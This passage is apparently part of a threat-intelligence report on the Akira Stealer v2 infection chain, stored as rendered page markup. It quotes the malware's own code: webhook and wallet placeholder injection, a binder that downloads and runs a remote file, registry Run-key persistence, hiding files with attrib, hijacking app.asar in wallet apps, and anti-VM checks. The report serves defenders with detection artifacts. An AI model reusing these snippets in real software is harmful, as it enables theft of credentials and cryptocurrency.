(",[1588,9788,9790],{"class":9789},"s4XuR","err",[1588,9792,2289],{"class":1778},[1588,9794,9795],{"class":9789},"data",[1588,9797,9798],{"class":1778},") ",[1588,9800,9801],{"class":1770},"=>",[1588,9803,9804],{"class":1778}," {\n",[1588,9806,9807,9810,9813,9815],{"class":1590,"line":864},[1588,9808,9809],{"class":1770},"  let",[1588,9811,9812],{"class":1778}," updatedFile ",[1588,9814,9180],{"class":1770},[1588,9816,9817],{"class":1778}," data\n",[1588,9819,9820,9823,9826,9828,9831,9834,9838],{"class":1590,"line":1814},[1588,9821,9822],{"class":1778},"    .",[1588,9824,9825],{"class":1756},"replace",[1588,9827,2030],{"class":1778},[1588,9829,9830],{"class":1774},"\"%DISCORD%\"",[1588,9832,9833],{"class":1778},", \u003C",[1588,9835,9837],{"class":9836},"s9eBZ","webhook",[1588,9839,9840],{"class":1778},">)\n",[1588,9842,9843,9846,9849],{"class":1590,"line":1831},[1588,9844,9845],{"class":1778},"    .replace(\"%ADDRESSBTC%\", \u003C",[1588,9847,9848],{"class":1760},"btc_address",[1588,9850,9840],{"class":1778},[1588,9852,9853],{"class":1590,"line":2135},[1588,9854,9855],{"class":1778},"    
...\n",[1588,9857,9858],{"class":1590,"line":2141},[1588,9859,9860],{"class":1778},"    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[1588,9862,9863],{"class":1590,"line":2147},[1588,9864,9865],{"emptyLinePlaceholder":508},"\n",[1588,9867,9868],{"class":1590,"line":2153},[1588,9869,9870],{"class":1778},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[1588,9872,9873],{"class":1590,"line":2159},[1588,9874,9875],{"class":1778},"});\n",[806,9877,9878],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[2738,9880,9881],{},[2741,9882,9883,9884,9886,9887],{},"Replaces placeholder strings in ",[1524,9885,6643],{},":\n",[2738,9888,9889,9895,9905],{},[2741,9890,9891,9892],{},"Discord webhook: ",[1524,9893,9894],{},"%DISCORD%",[2741,9896,9897,9898,2289,9901,9904],{},"Wallet addresses: ",[1524,9899,9900],{},"%ADDRESSBTC%",[1524,9902,9903],{},"%ADDRESSETH%",", etc.",[2741,9906,9907],{},"User ID and error flags",[1671,9909,9911],{"id":9910},"_624-malware-execution","6.2.4 Malware Execution",[806,9913,1677],{},[2738,9915,9916],{},[2741,9917,9918,9919],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[1545,9920,9922],{"className":9007,"code":9921,"language":9009,"meta":863,"style":863},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[1524,9923,9924],{"__ignoreMap":863},[1588,9925,9926,9929,9931,9934,9937,9940,9942,9945],{"class":1590,"line":1591},[1588,9927,9928],{"class":1756},"exec",[1588,9930,2030],{"class":1778},[1588,9932,9933],{"class":1774},"\"python.exe 
Crypto",[1588,9935,9936],{"class":1760},"\\\\",[1588,9938,9939],{"class":1774},"Util",[1588,9941,9936],{"class":1760},[1588,9943,9944],{"class":1774},"astor.py\"",[1588,9946,2308],{"class":1778},[806,9948,9949],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[806,9951,9952],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[2738,9954,9955,9963,9970,9977],{},[2741,9956,9957,9959,9960],{},[1524,9958,6639],{}," (Electron-based container) invokes ",[1524,9961,9962],{},"node.exe",[2741,9964,9965,9967,9968],{},[1524,9966,9962],{}," launches ",[1524,9969,7144],{},[2741,9971,9972,9974,9975],{},[1524,9973,7144],{}," starts ",[1524,9976,6615],{},[2741,9978,9979,9981,9982],{},[1524,9980,6615],{}," executes the file ",[1524,9983,7154],{},[1671,9985,9987],{"id":9986},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[806,9989,1677],{},[806,9991,9992,9993,9995],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[1524,9994,6635],{},") to a hidden location within the user’s profile.",[806,9997,9998],{},[1736,9999,10000],{},"Target Directory",[806,10002,10003],{},"The file is copied to a directory that mimics legitimate Windows components:",[1545,10005,10007],{"className":9007,"code":10006,"language":9009,"meta":863,"style":863},"%APPDATA%\\Microsoft\\Internet 
Explorer\\UserData\\Updater.exe\n",[1524,10008,10009],{"__ignoreMap":863},[1588,10010,10011,10013,10016,10018],{"class":1590,"line":1591},[1588,10012,2761],{"class":1770},[1588,10014,10015],{"class":1760},"APPDATA",[1588,10017,2761],{"class":1770},[1588,10019,10020],{"class":1778},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[806,10022,10023],{},"This location is intentionally chosen:",[2738,10025,10026,10029],{},[2741,10027,10028],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[2741,10030,10031],{},"The directory name mimics legitimate Microsoft application folders, making it less suspicious.",[806,10033,10034],{},[1736,10035,10036],{},"Copy Mechanism:",[806,10038,10039],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[1545,10041,10043],{"className":9007,"code":10042,"language":9009,"meta":863,"style":863},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[1524,10044,10045,10054,10064,10073,10082,10089,10096,10103,10110,10115],{"__ignoreMap":863},[1588,10046,10047,10049,10052],{"class":1590,"line":1591},[1588,10048,9749],{"class":1778},[1588,10050,10051],{"class":1756},"copyFileSync",[1588,10053,9031],{"class":1778},[1588,10055,10056,10059,10062],{"class":1590,"line":864},[1588,10057,10058],{"class":1778},"  process.env.",[1588,10060,10061],{"class":1760},"PORTABLE_EXECUTABLE_FILE",[1588,10063,9061],{"class":1778},[1588,10065,10066,10069,10071],{"class":1590,"line":1814},[1588,10067,10068],{"class":1778},"  path.",[1588,10070,9391],{"class":1756},[1588,10072,9031],{"class":1778},[1588,10074,10075,10078,10080],{"class":1590,"line":1831},[1588,10076,10077],{"class":1778},"    process.env.",[1588,10079,10015],{"class":1760},[1588,10081,9061],{"class":1778},[1588,10083,10084,10087],{"class":1590,"line":2135},[1588,10085,10086],{"class":1774},"   
 \"Microsoft\"",[1588,10088,9061],{"class":1778},[1588,10090,10091,10094],{"class":1590,"line":2141},[1588,10092,10093],{"class":1774},"    \"Internet Explorer\"",[1588,10095,9061],{"class":1778},[1588,10097,10098,10101],{"class":1590,"line":2147},[1588,10099,10100],{"class":1774},"    \"UserData\"",[1588,10102,9061],{"class":1778},[1588,10104,10105,10108],{"class":1590,"line":2153},[1588,10106,10107],{"class":1774},"    \"Updater.exe\"",[1588,10109,9061],{"class":1778},[1588,10111,10112],{"class":1590,"line":2159},[1588,10113,10114],{"class":1778},"  ),\n",[1588,10116,10117],{"class":1590,"line":2165},[1588,10118,2308],{"class":1778},[2738,10120,10121,10124],{},[2741,10122,10123],{},"PORTABLE_EXECUTABLE_FILE is an environment variable set by electron-builder's portable (NSIS) launcher to the full path of the running portable executable; Electron itself does not set it, so its use suggests the dropper was packaged as an electron-builder portable app.",[2741,10125,10126],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[806,10128,10129],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[806,10131,10132,10135],{},[1736,10133,10134],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[2738,10137,10138,10141],{},[2741,10139,10140],{},"The loader binary sits at a stable path that survives reboots. Note that the copy itself installs no autostart: the HKCU Run value that points at this Updater.exe is written later by the Python stage (see section 7.2.2).",[2741,10142,10143],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate from this copy even if the originally downloaded file is removed; together with the Run-key entry and the app.asar hijack described in section 7.2, this gives the malware several independent routes back onto the system.",[1671,10145,10147],{"id":10146},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[806,10149,1677],{},[806,10151,10152,10153,10155],{},"In addition to downloading and executing the main stealer payload (",[1524,10154,6643],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for 
persistence, distraction, or deployment of additional malware modules.",[806,10157,10158],{},[1736,10159,10160],{},"Conditional Execution",[806,10162,10163],{},"The binder logic is only activated if a specific flag is set:",[1545,10165,10167],{"className":9007,"code":10166,"language":9009,"meta":863,"style":863},"enableBinder = true;\n",[1524,10168,10169],{"__ignoreMap":863},[1588,10170,10171,10174,10176,10179],{"class":1590,"line":1591},[1588,10172,10173],{"class":1778},"enableBinder ",[1588,10175,9180],{"class":1770},[1588,10177,10178],{"class":1760}," true",[1588,10180,2849],{"class":1778},[806,10182,10183,10184,10187],{},"In the sample analyzed, this value was set to ",[1524,10185,10186],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.",[806,10189,10190],{},[1736,10191,10192],{},"Binder Download Logic",[806,10194,10195,10196,10199],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[1524,10197,10198],{},"%BINDERURL%"," placeholder:",[1545,10201,10203],{"className":9007,"code":10202,"language":9009,"meta":863,"style":863},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[1524,10204,10205,10219,10239,10254],{"__ignoreMap":863},[1588,10206,10207,10209,10212,10214,10217],{"class":1590,"line":1591},[1588,10208,9016],{"class":1770},[1588,10210,10211],{"class":1760}," fileUrl",[1588,10213,9022],{"class":1770},[1588,10215,10216],{"class":1774}," 
\"%BINDERURL%\"",[1588,10218,2849],{"class":1778},[1588,10220,10221,10223,10225,10227,10229,10231,10233,10235,10237],{"class":1590,"line":864},[1588,10222,9016],{"class":1770},[1588,10224,9482],{"class":1760},[1588,10226,9022],{"class":1770},[1588,10228,9487],{"class":1770},[1588,10230,9490],{"class":1778},[1588,10232,9493],{"class":1756},[1588,10234,9496],{"class":1778},[1588,10236,9499],{"class":1774},[1588,10238,9502],{"class":1778},[1588,10240,10241,10243,10245,10247,10249,10251],{"class":1590,"line":1814},[1588,10242,9016],{"class":1770},[1588,10244,9520],{"class":1760},[1588,10246,9022],{"class":1770},[1588,10248,9525],{"class":1778},[1588,10250,9528],{"class":1756},[1588,10252,10253],{"class":1778},"(binderFile);\n",[1588,10255,10256,10258,10260],{"class":1590,"line":1831},[1588,10257,9536],{"class":1778},[1588,10259,9539],{"class":1756},[1588,10261,9542],{"class":1778},[2738,10263,10264,10269],{},[2741,10265,8620,10266,10268],{},[1524,10267,9370],{}," file is saved into the system's temporary directory.",[2741,10270,10271,10272,10274],{},"Like ",[1524,10273,8894],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[806,10276,10277],{},[1736,10278,10279],{},"Execution Strategy",[806,10281,10282,10283,10285],{},"After successful download, the script invokes the downloaded binary using ",[1524,10284,7144],{},", ensuring that it runs in a new shell context:",[1545,10287,10289],{"className":9007,"code":10288,"language":9009,"meta":863,"style":863},"exec(`start cmd /c start ${binderFile}`, ...);\n",[1524,10290,10291],{"__ignoreMap":863},[1588,10292,10293,10295,10297,10300,10303,10306,10308,10311],{"class":1590,"line":1591},[1588,10294,9928],{"class":1756},[1588,10296,2030],{"class":1778},[1588,10298,10299],{"class":1774},"`start cmd /c start 
${",[1588,10301,10302],{"class":1778},"binderFile",[1588,10304,10305],{"class":1774},"}`",[1588,10307,2289],{"class":1778},[1588,10309,10310],{"class":1770},"...",[1588,10312,2308],{"class":1778},[806,10314,10315],{},"To increase reliability, the script also schedules a second, unconditional launch a few seconds later:",[1545,10317,10319],{"className":9007,"code":10318,"language":9009,"meta":863,"style":863},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[1524,10320,10321,10333,10344],{"__ignoreMap":863},[1588,10322,10323,10326,10329,10331],{"class":1590,"line":1591},[1588,10324,10325],{"class":1756},"setTimeout",[1588,10327,10328],{"class":1778},"(() ",[1588,10330,9801],{"class":1770},[1588,10332,9804],{"class":1778},[1588,10334,10335,10338,10340,10342],{"class":1590,"line":864},[1588,10336,10337],{"class":1756},"  exec",[1588,10339,2030],{"class":1778},[1588,10341,10310],{"class":1770},[1588,10343,2308],{"class":1778},[1588,10345,10346,10349,10352],{"class":1590,"line":1814},[1588,10347,10348],{"class":1778},"}, ",[1588,10350,10351],{"class":1760},"5000",[1588,10353,2308],{"class":1778},[806,10355,10356],{},"The delayed call fires regardless of the outcome of the first launch—the snippet contains no check of its result—so if the initial execution fails (e.g., due to system load or race conditions) the binary is launched again after five seconds, and if it succeeded a second instance may simply be started. This is a crude retry rather than genuine error handling.",[806,10358,10359],{},[1736,10360,10361],{},"Use Cases for the Binder",[806,10363,10364],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[2738,10366,10367,10370,10373,10376],{},[2741,10368,10369],{},"Reinstall or relaunch the primary malware components",[2741,10371,10372],{},"Display fake installers or decoy applications",[2741,10374,10375],{},"Deploy additional spyware, backdoors, or ransomware",[2741,10377,10378],{},"Modify system settings or disable security features",[810,10380,10382],{"id":10381},"_63-summary","6.3 Summary",[806,10384,1536],{},[806,10386,10387,10389],{},[1524,10388,8833],{}," is a highly obfuscated, 
encrypted JavaScript loader that uses industry-standard primitives (PBKDF2 + AES-256-CBC) to hide its true purpose. Because the master key, salt and IV are all hardcoded in the same file, this is obfuscation rather than real protection: anyone holding the sample can reproduce the key derivation and decrypt the payload offline without ever executing it. Upon decryption, it operates as a fully capable second-stage loader that:",[2738,10391,10392,10397,10400,10405],{},[2741,10393,10394,10395,2772],{},"Retrieves further malware (",[1524,10396,8894],{},[2741,10398,10399],{},"Modifies payload behavior dynamically",[2741,10401,10402,10403,2772],{},"Launches the actual stealer script (",[1524,10404,6643],{},[2741,10406,10407,10408],{},"Reinforces persistence by restoring ",[1524,10409,6635],{},[806,10411,10412,10413,10416],{},"Its combination of encryption, dynamic execution, modular payload fetching, and in-memory execution of the JavaScript stage (only that stage is fileless—the Python stage is still written to the temp directory as pyth.zip and astor.py, which leaves file-based artifacts for defenders) showcases a ",[1736,10414,10415],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[1511,10418,10420,10421,2772],{"id":10419},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[1524,10422,6643],{},[806,10424,816],{},[810,10426,10428],{"id":10427},"_71-high-level-functionality","7.1. High-Level Functionality",[806,10430,1536],{},[806,10432,10433,10434,10436],{},"Akira Stealer v2 (",[1524,10435,6643],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. 
It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[810,10438,10440],{"id":10439},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[806,10442,1536],{},[1671,10444,10446],{"id":10445},"_721-execution-chain-context","7.2.1 Execution Chain Context",[806,10448,1677],{},[806,10450,10451,10453],{},[1524,10452,6643],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[1545,10455,10459],{"className":10456,"code":10457,"language":10458,"meta":863,"style":863},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[1524,10460,10461,10466,10471,10476],{"__ignoreMap":863},[1588,10462,10463],{"class":1590,"line":1591},[1588,10464,10465],{},"Updater.exe\n",[1588,10467,10468],{"class":1590,"line":864},[1588,10469,10470],{},"  └── main.exe (Electron app)\n",[1588,10472,10473],{"class":1590,"line":1814},[1588,10474,10475],{},"        └── cmd.exe\n",[1588,10477,10478],{"class":1590,"line":1831},[1588,10479,10480],{},"              └── python.exe astor.py\n",[806,10482,10483,10484,10486],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[1524,10485,6635],{}," initiates the sequence and is responsible for maintaining persistence.",[1671,10488,10490],{"id":10489},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[806,10492,1677],{},[806,10494,10495,10496,10498],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. 
This ensures that ",[1524,10497,6635],{}," is executed at every interactive logon of the infected user (HKCU Run entries fire at user logon, not at system boot, and need no elevation to write):",[1545,10500,10504],{"className":10501,"code":10502,"language":10503,"meta":863,"style":863},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[1524,10505,10506,10511],{"__ignoreMap":863},[1588,10507,10508],{"class":1590,"line":1591},[1588,10509,10510],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[1588,10512,10513],{"class":1590,"line":864},[1588,10514,10515],{},"os.system(command)\n",[2738,10517,10518,10525,10533],{},[2741,10519,10520,2545,10523],{},[1736,10521,10522],{},"Path",[1524,10524,7686],{},[2741,10526,10527,2545,10530,10532],{},[1736,10528,10529],{},"Value name",[1524,10531,7694],{}," (chosen to appear benign)",[2741,10534,10535,10538,10539],{},[1736,10536,10537],{},"Payload path",": Typically in ",[1524,10540,10541],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[806,10543,10544,10545,10548],{},"This command silently writes the autorun entry by running reg.exe through ",[1524,10546,10547],{},"os.system()",", which on Windows launches it via cmd.exe; no PowerShell is involved in the snippet shown, so the process chain to hunt for is python.exe spawning cmd.exe spawning reg.exe that adds a value under the HKCU Run key.",[1671,10550,10552],{"id":10551},"_723-file-concealment","7.2.3 File Concealment",[806,10554,1677],{},[806,10556,10557],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[1545,10559,10561],{"className":10501,"code":10560,"language":10503,"meta":863,"style":863},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[1524,10562,10563],{"__ignoreMap":863},[1588,10564,10565],{"class":1590,"line":1591},[1588,10566,10560],{},[2738,10568,10569,10575],{},[2741,10570,10571,10574],{},[1524,10572,10573],{},"+h",": Marks the file as 
hidden",[2741,10576,10577,10580],{},[1524,10578,10579],{},"+s",": Marks the file as a protected system file",[806,10582,10583],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[1671,10585,10587],{"id":10586},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[806,10589,1677],{},[806,10591,10592,10593,10595,10596,2289,10599,10602],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[1524,10594,7089],{}," archive in Electron-based desktop wallets (e.g., ",[1736,10597,10598],{},"Exodus",[1736,10600,10601],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[806,10604,10605],{},"The logic looks for known wallet app paths:",[1545,10607,10609],{"className":10501,"code":10608,"language":10503,"meta":863,"style":863},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[1524,10610,10611],{"__ignoreMap":863},[1588,10612,10613],{"class":1590,"line":1591},[1588,10614,10608],{},[806,10616,10617,10618,2786],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[1524,10619,6635],{},[810,10621,10623,10624,2772],{"id":10622},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[1524,10625,10626],{},"VmProtect",[806,10628,1536],{},[1671,10630,10632],{"id":10631},"_731-introduction","7.3.1 Introduction",[806,10634,1677],{},[806,10636,10637,10638,10640,10641,10643],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[4655,10639,6704],{}," implements a comprehensive VM/sandbox detection module (",[1524,10642,10626],{},") that aggressively identifies and aborts execution under analyst-controlled environments. 
This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[1671,10645,10647],{"id":10646},"_732-overview","7.3.2 Overview",[806,10649,1677],{},[806,10651,8620,10652,10654],{},[1524,10653,10626],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[2738,10656,10657,10663],{},[2741,10658,10659,10662],{},[1736,10660,10661],{},"Level 1",": Lightweight, fast checks",[2741,10664,10665,10668],{},[1736,10666,10667],{},"Level 2",": In-depth, comprehensive probes",[806,10670,10671,10672,10675,10676,10679,10680,10683],{},"If ",[1524,10673,10674],{},"VmProtect.isVM(level)"," returns ",[1524,10677,10678],{},"True",", the malware calls ",[1524,10681,10682],{},"sys.exit()",", preventing further analysis.",[1671,10685,10687],{"id":10686},"_733-detection-levels","7.3.3 Detection Levels",[806,10689,1677],{},[1902,10691,1905,10693],{"style":10692},"width:100%; border-collapse: collapse;",[1923,10694,10695,1905,10705,1905,10715,1905,10725,1905,10734,1905,10744,1905,10753,1905,10762],{},[1911,10696,1909,10697,1909,10700,1909,10703,1905],{},[1915,10698,10699],{},"Feature",[1915,10701,10661],{"style":10702},"text-align: center;",[1915,10704,10667],{"style":10702},[1911,10706,1909,10707,1909,10710,1909,10713,1905],{},[1928,10708,10709],{},"HTTPSimulation",[1928,10711,10712],{"style":10702},"✔️",[1928,10714,10712],{"style":10702},[1911,10716,1909,10718,1909,10721,1909,10723,1905],{"style":10717},"background-color: #f5f5f5;",[1928,10719,10720],{},"Computer-name blacklist",[1928,10722,10712],{"style":10702},[1928,10724,10712],{"style":10702},[1911,10726,1909,10727,1909,10730,1909,10732,1905],{},[1928,10728,10729],{},"User-account 
blacklist",[1928,10731,10712],{"style":10702},[1928,10733,10712],{"style":10702},[1911,10735,1909,10736,1909,10739,1909,10742,1905],{"style":10717},[1928,10737,10738],{},"Hardware-UUID blacklist",[1928,10740,10741],{"style":10702},"❌",[1928,10743,10712],{"style":10702},[1911,10745,1909,10746,1909,10749,1909,10751,1905],{},[1928,10747,10748],{},"Public-hosting API check",[1928,10750,10741],{"style":10702},[1928,10752,10712],{"style":10702},[1911,10754,1909,10755,1909,10758,1909,10760,1905],{"style":10717},[1928,10756,10757],{},"Registry & GPU hints",[1928,10759,10741],{"style":10702},[1928,10761,10712],{"style":10702},[1911,10763,1909,10764,1909,10767,1909,10769,1905],{},[1928,10765,10766],{},"Task-killing background",[1928,10768,10712],{"style":10702},[1928,10770,10712],{"style":10702},[1541,10772],{"className":10773},[6875,6876],[1671,10775,10777,10778,10780],{"id":10776},"_734-vmprotect-architecture","7.3.4 ",[1524,10779,10626],{}," Architecture",[806,10782,1677],{},[806,10784,8620,10785,10787],{},[1524,10786,10626],{}," class exposes the following primary methods:",[2738,10789,10790,10797,10804,10811,10818,10825,10832,10839],{},[2741,10791,10792],{},[1736,10793,10794],{},[1524,10795,10796],{},"checkUUID()",[2741,10798,10799],{},[1736,10800,10801],{},[1524,10802,10803],{},"checkComputerName()",[2741,10805,10806],{},[1736,10807,10808],{},[1524,10809,10810],{},"checkUsers()",[2741,10812,10813],{},[1736,10814,10815],{},[1524,10816,10817],{},"checkHosting()",[2741,10819,10820],{},[1736,10821,10822],{},[1524,10823,10824],{},"checkHTTPSimulation()",[2741,10826,10827],{},[1736,10828,10829],{},[1524,10830,10831],{},"checkRegistry()",[2741,10833,10834],{},[1736,10835,10836],{},[1524,10837,10838],{},"killTasks()",[2741,10840,10841],{},[1736,10842,10843],{},[1524,10844,10845],{},"isVM(level)",[806,10847,10848,10849,10852],{},"Each method returns a boolean or executes evasion steps. 
The ",[1524,10850,10851],{},"isVM"," wrapper aggregates these checks based on the specified level.",[1902,10854,1905,10855],{"style":10692},[1923,10856,10857,1905,10869,1905,10883,1905,10897,1905,10910,1905,10923,1905,10936,1905,10949,1905,10964],{},[1911,10858,1909,10859,1909,10863,1909,10866,1905],{},[1915,10860,10862],{"style":10861},"text-align: left;","Method",[1915,10864,10865],{"style":10861},"Triggered By",[1915,10867,10868],{"style":10861},"Description",[1911,10870,1909,10871,1909,10875,1909,10880,1905],{},[1928,10872,10873],{},[1524,10874,10796],{},[1928,10876,10877],{},[1524,10878,10879],{},"isVM(2)",[1928,10881,10882],{},"WMI UUID blacklist",[1911,10884,1909,10885,1909,10889,1909,10894,1905],{"style":10717},[1928,10886,10887],{},[1524,10888,10803],{},[1928,10890,10891],{},[1524,10892,10893],{},"isVM(1,2)",[1928,10895,10896],{},"Environment hostname match",[1911,10898,1909,10899,1909,10903,1909,10907,1905],{},[1928,10900,10901],{},[1524,10902,10810],{},[1928,10904,10905],{},[1524,10906,10893],{},[1928,10908,10909],{},"Username blacklist",[1911,10911,1909,10912,1909,10916,1909,10920,1905],{"style":10717},[1928,10913,10914],{},[1524,10915,10817],{},[1928,10917,10918],{},[1524,10919,10879],{},[1928,10921,10922],{},"IP hosting provider check via ip-api.com",[1911,10924,1909,10925,1909,10929,1909,10933,1905],{},[1928,10926,10927],{},[1524,10928,10824],{},[1928,10930,10931],{},[1524,10932,10893],{},[1928,10934,10935],{},"HTTPS interception detection",[1911,10937,1909,10938,1909,10942,1909,10946,1905],{"style":10717},[1928,10939,10940],{},[1524,10941,10831],{},[1928,10943,10944],{},[1524,10945,10879],{},[1928,10947,10948],{},"Registry & GPU driver artifacts",[1911,10950,1909,10951,1909,10955,1909,10961,1905],{},[1928,10952,10953],{},[1524,10954,10838],{},[1928,10956,10957,10960],{},[1524,10958,10959],{},"isVM(...)"," spawn",[1928,10962,10963],{},"Terminates known analysis 
processes",[1911,10965,1909,10966,1909,10970,1909,10973,1905],{"style":10717},[1928,10967,10968],{},[1524,10969,10845],{},[1928,10971,10972],{},"init",[1928,10974,10975,10976,10978],{},"Aggregates checks and calls ",[1524,10977,10838],{}," thread",[1541,10980],{"className":10981},[6875,6876],[1545,10983,10985],{"className":10501,"code":10984,"language":10503,"meta":863,"style":863},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[1524,10986,10987,10992,10997,11002,11007,11012,11017,11022,11027,11032,11037,11043,11049,11055,11061,11067,11073,11079,11085,11091,11097,11103,11109,11115,11121],{"__ignoreMap":863},[1588,10988,10989],{"class":1590,"line":1591},[1588,10990,10991],{},"@staticmethod\n",[1588,10993,10994],{"class":1590,"line":864},[1588,10995,10996],{},"def isVM(level: int) -> bool:\n",[1588,10998,10999],{"class":1590,"line":1814},[1588,11000,11001],{},"    # Always start background task-killer\n",[1588,11003,11004],{"class":1590,"line":1831},[1588,11005,11006],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[1588,11008,11009],{"class":1590,"line":2135},[1588,11010,11011],{},"    if level == 
1:\n",[1588,11013,11014],{"class":1590,"line":2141},[1588,11015,11016],{},"        # Fast path: HTTPS, hostname & user\n",[1588,11018,11019],{"class":1590,"line":2147},[1588,11020,11021],{},"        return (\n",[1588,11023,11024],{"class":1590,"line":2153},[1588,11025,11026],{},"            VmProtect.checkHTTPSimulation()\n",[1588,11028,11029],{"class":1590,"line":2159},[1588,11030,11031],{},"            or VmProtect.checkComputerName()\n",[1588,11033,11034],{"class":1590,"line":2165},[1588,11035,11036],{},"            or VmProtect.checkUsers()\n",[1588,11038,11040],{"class":1590,"line":11039},11,[1588,11041,11042],{},"        )\n",[1588,11044,11046],{"class":1590,"line":11045},12,[1588,11047,11048],{},"    if level == 2:\n",[1588,11050,11052],{"class":1590,"line":11051},13,[1588,11053,11054],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[1588,11056,11058],{"class":1590,"line":11057},14,[1588,11059,11060],{},"        try:\n",[1588,11062,11064],{"class":1590,"line":11063},15,[1588,11065,11066],{},"            return (\n",[1588,11068,11070],{"class":1590,"line":11069},16,[1588,11071,11072],{},"                VmProtect.checkHTTPSimulation()\n",[1588,11074,11076],{"class":1590,"line":11075},17,[1588,11077,11078],{},"                or VmProtect.checkUUID()\n",[1588,11080,11082],{"class":1590,"line":11081},18,[1588,11083,11084],{},"                or VmProtect.checkComputerName()\n",[1588,11086,11088],{"class":1590,"line":11087},19,[1588,11089,11090],{},"                or VmProtect.checkUsers()\n",[1588,11092,11094],{"class":1590,"line":11093},20,[1588,11095,11096],{},"                or VmProtect.checkHosting()\n",[1588,11098,11100],{"class":1590,"line":11099},21,[1588,11101,11102],{},"                or VmProtect.checkRegistry()\n",[1588,11104,11106],{"class":1590,"line":11105},22,[1588,11107,11108],{},"            )\n",[1588,11110,11112],{"class":1590,"line":11111},23,[1588,11113,11114],{},"        
